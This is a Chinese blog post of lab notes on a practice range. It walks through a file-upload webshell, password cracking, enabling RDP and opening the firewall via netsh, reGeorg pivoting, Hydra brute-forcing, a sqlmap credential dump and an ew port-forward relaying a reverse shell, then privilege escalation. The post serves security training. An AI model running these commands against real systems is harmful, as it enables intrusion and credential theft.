第二次靶场实验笔记

最新推荐文章于 2022-08-17 12:24:47 发布
最新推荐文章于 2022-08-17 12:24:47 发布
阅读量258 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hyy_ideal/article/details/103203358
版权

目录

第二次实验靶场练习笔记

实验要求

找出靶场中的3个flag

实验环境

  1. 靶机下载地址:https://pan.baidu.com/s/17KNdgTOBStnfE0MEYPP6lQ 提取码:0u6b

  2. 配置环境:
    设置win2003 网卡为nat ;物理机Adapter for VMnet8设置为100网段

  3. 外网机器ip为192.168.100.130。

实验开始

浏览器打开192.168.100.130,进入网站

文件上传漏洞

  1. 文件上传漏洞地址:http://192.168.100.130/admin/include/uploadify.php
    为了便于利用把他写成一个html文件
    在这里插入图片描述
  2. 编写完成后用浏览器打开上传一句话木马
    在这里插入图片描述
  3. 上传完成使用菜刀连接
    在这里插入图片描述
  4. 拿到webshell,查看目前的权限
    在这里插入图片描述
  5. 权限足够,直接上传工具获取密码,步骤同第一次实验笔记
    在这里插入图片描述
    MD5解析后得到密码为a1b2c3在这里插入图片描述
  6. 查看远程开放端口是否开启在这里插入图片描述
    没有开启,命令行开启3389
    在这里插入图片描述
  7. 这时拿上刚才的密码远程连接,发现这时还是连不上
    在这里插入图片描述
    猜测可能是防火墙的原因,命令行输入netsh firewall set portopening TCP 3389 ENABLE 使防火墙放行3389
    在这里插入图片描述
    连接完成后在桌面上有第一个flag在这里插入图片描述

爆破进入内网

进入外网机器后打开浏览器翻阅浏览历史,发现两个网址
在这里插入图片描述
尝试连接发现账号名称但没有密码,还需要爆破出密码
在这里插入图片描述
利用菜刀上传端口转发所需文件到外网机器
在这里插入图片描述
为了方便使用修改名字为1.php,在web端运行这个文件
在这里插入图片描述
保留下地址备用。
打开kali,修改kali中代理工具的默认配置文件,
在这里插入图片描述
运行reGeorg-master工具中的python文件
在这里插入图片描述
代理完成,开启九头蛇爆破出密码
在这里插入图片描述
得到密码123456,回到外网机器打开浏览器登陆ftp://10.200.1.15,发现第二个flag
在这里插入图片描述

sql注入,端口反弹,linux提权

登陆上ftp后发现是网站源代码,经过简单的审计后发现可能存在sql注入的地址
地址:http://10.200.1.16/message.php?id=1
手动测出注入方式为联合查询注入,显示位为2,使用proxychains sqlmap -u http://10.200.1.16/message.php?id=1 -D my_oa -T admin -C password,username --dump找到账号密码
在这里插入图片描述
然后拿着账号密码登陆在源代码里发现的OA系统
![在这里插入图片描述](https://img-blog.csdnimg.cn/2019112522504739.png

在这里插入图片描述
登陆后就是文件上传漏洞,上传大马
在这里插入图片描述
上传大马后先用物理机监听5555端口
在这里插入图片描述
然后上传ew到外网机上,输入ew_for_Win.exe -s lcx_tran -l 4444 -f 192.168.100.1 -g 5555进行端口转发
在这里插入图片描述
再利用大马反弹端口到物理机在这里插入图片描述
这是完成端口转发,再查看自身当前权限,发现还需要提权,通过大马上传对应的exp。还需要修改上传的exp的权限为可读可写可执行
在这里插入图片描述
提权完成后进入root目录下发现第三个flag
在这里插入图片描述

hyy_ideal
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网安全-隧道穿透漫游
m0_67105288的博客
02-23 626
隧道穿透与端口转发 什么是隧道? 在渗透测试中,进入内网后,我们要判断流量是否能够出的去、进的来。 在实际的网络情况下,流量会经过很多的边界设备,在一般的企业内网中,可能会存在 IDP、IPS、防火墙等设备,如果异常的话,就会直接将通信阻断;这里我们说的隧道,就是绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方通信。当被封装的数据包达到了另外的地址的时候,解包还原,并将还原后的数据包发送到相应的服务器上。 常见的隧道包括三个大类:网络层、应用
靶场实验练习笔记
hyy_ideal的博客
11-21 587
目录实验靶场练习笔记实验要求实验环境实验要求实验开始弱口令登陆网站后台文件上传漏洞进入内网导出导入 实验靶场练习笔记 实验要求 找出靶场中的5个flag 实验环境 靶机下载地址: ( 注:win2003为外网可访问机器,linux为内网机器 ) 配置环境: 设置win2003 网卡为nat ;物理机网卡Adapter for VMnet8设置为100网段 外网机器ip为192.168....
vulnhub靶场 prime1靶机获得flag
weixin_43410194的博客
08-17 1911
vulnhub靶场 prime1靶机获得flag
第二次靶场实验报告
weixin_45477500的博客
11-25 487
实验 文章目录 实验 实验工具 搭建环境 实验要求 实验步骤 第一个Flag(文件上传漏洞) 第二个Flag(代理 hydra密码爆破) 第三个Flag(sql注入,端口转发,提权) 实验工具 VMware Workstation 15 Player 百度云链接提取码:0u6b 搭建环境 1.外网靶场 IP:192.168.100.130 NAT模式 2.调整物理机的网卡VMnet8的ipv4为1...
[极客大挑战 2019]Not Bad刷题
qq_43766802的博客
09-28 458
检查下程序的保护措施 拖入ida发现程序打开了沙盒保护,随即用seccomp-tools工具查看下白名单 因此这题选择用orw来get flag 函数允许我们输入0x38个字节,但buf只有0x20大小,并且只能溢出0x18个字节,用buf来装orw的汇编代码是绝对不够的,但程序一开始mmap了内存中的一段区域,我们可以利用这段区域来保存我们的shellcode,并发现该程序有jmp rsp,利用jmp rsp可以直接执行栈上的内容 write up from pwn import..
metinfov5.0.4漏洞复现
Key_book(句芒安全实验室)
06-07 3698
metinfov5.0.4漏洞复现 最近学习,metinfov5.0.4漏洞复现,个人感觉这次的漏洞还是比较有意思的,为什么呢?原因是这次的3个漏洞都跟一个漏洞有关,这个漏洞就是变量覆盖覆盖漏洞. 简单讲就是用户传进去的值变成了一个新的变量覆盖了原代码的变量,从而被我们利用. 产生的原因是因为编程人员在进行变量传值时,使用了双(“$$”)符号 . 下面开始漏洞复现 测试环境: ...
CSRF漏洞的靶场实验
09-19
在“CSRF漏洞的靶场实验”中,我们将通过实际操作来理解这种攻击方式以及如何防御。 首先,我们需要了解CSRF攻击的基本原理。当用户访问一个网站并登录后,浏览器会保存一个叫做会话(Session)的状态,使得用户在...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
OWASP Mutillidae II 漏洞靶场实验指导书.pdf
11-20
OWASP Mutillidae II 漏洞靶场实验指导书汇总 OWASP Top 10 应用安全风险-2017 OWASP (Open Web Application Security Project)开放式 Web 应用程序 安全项目,是一个组织,它提供有关计算机和互联网应用程序的...
hackme2靶场刷题记录
qq_53755216的博客
07-28 400
写在前面 最近看到貌似有些靶机挺好玩的 下了个靶机来玩一下 nmap扫一下端口 扫到了 直接进入 渗透开始! 猜测 search 有sql注入 sqlmap简单梭以下 没啥反应。。。 回到登录框 看看这边有没有什么搞头 直接bp扫描器一开 直接扫出了一个xss是我没想到的 payload username=admint807c%22%3e%3cscript%3ealert(1)%3c%2fscript%3eoqu8p&password=password <!DOCTYPE html&g
多节点实验靶机练习(二)
guowenkecom的博客
11-22 403
目录项目名称:实验环境:靶机下载地址:实验要求:所需工具:环境搭建项目实施1. 测试网站的访问性2.信息收集3.漏洞探寻及利用 项目名称: 实验靶机练习(二) 实验环境: Linux内网机器两台 window 2003 一台 win2003 为外网可以访问到的机器 网卡为nat IP为192.168.100.130 靶机下载地址: 实验要求: 找到三个flag,禁止在实验过程中操作虚拟机 所需工具...
使用uploadify进行上传
我生活的点滴
01-07 7139
Html代码   html>  bead>  link href="${cssPath}/uploadify.css" rel="stylesheet" type="text/css" />  script language="javascript" type="text/javascript"      src="${jsPath}/jquery-1.3.2.js">script>
nginx资源useless,don't download
07-09
nginx资源useless,don't download
util-linux-2.37.2.tar.xz
07-09
util-linux-2.37.2.tar.xz
“人力资源+大数据+薪酬报告+涨薪调薪”
07-09
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
API-pour-les-nuls-WSM14025FRFR-3-of-5.pdf
07-09
api
40-60平面不锈钢.cdr
最新发布
07-09
40-60平面不锈钢.cdr
upload-labs靶场第二关
06-06
第二关的目标是上传一个图片文件,并成功绕过图片类型的检测,上传一个 PHP 木马文件。 步骤如下: 1. 点击页面上的上传按钮,选择一个图片文件并上传。 2. 拦截上传的请求,使用 Burp Suite 修改 Content-Type 为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值